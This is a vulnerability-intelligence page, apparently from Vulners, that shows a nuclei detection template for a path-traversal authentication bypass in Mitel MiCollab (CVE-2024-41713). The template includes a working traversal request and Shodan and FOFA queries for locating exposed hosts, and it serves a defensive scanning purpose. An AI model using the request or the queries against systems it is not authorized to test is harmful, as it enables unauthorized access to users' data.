Lucene search

K

Mitel MiCollab - Authentication Bypass

🗓️ 05 Dec 2024 11:11:43Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Mitel MiCollab vulnerability allows unauthorized access via authentication bypass, risking data integrity.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2024-35286
21 Oct 202400:00
cvelist
Cvelist
CVE-2024-41713
21 Oct 202400:00
cvelist
GithubExploit
Exploit for Path Traversal in Mitel Micollab
11 Jan 202502:39
githubexploit
GithubExploit
Exploit for Path Traversal in Mitel Micollab
5 Dec 202406:13
githubexploit
Vulnrichment
CVE-2024-35286
21 Oct 202400:00
vulnrichment
Vulnrichment
CVE-2024-41713
21 Oct 202400:00
vulnrichment
NVD
CVE-2024-35286
21 Oct 202421:15
nvd
NVD
CVE-2024-41713
21 Oct 202421:15
nvd
OpenVAS
Apache Axis2 Detection (HTTP)
20 Sep 201000:00
openvas
OpenVAS
Directory Scanner
3 Nov 200500:00
openvas
Rows per page
id: CVE-2024-41713

info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.12006
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve204,mitel,cmg-suite,auth-bypass

http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022071c2e0cacae9ddccb1def297ab46e88b91dc5ff1f5f3d05c8f2181e5070d23e2022062a66764361eca00011f8568ae9df5c05a3e47bcc30221e27fc52dff54ad76b3:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
05 Dec 2024 11:43Current
7.3High risk
Vulners AI Score7.3
CVSS39.8
EPSS0.952
SSVC
12
.json
Report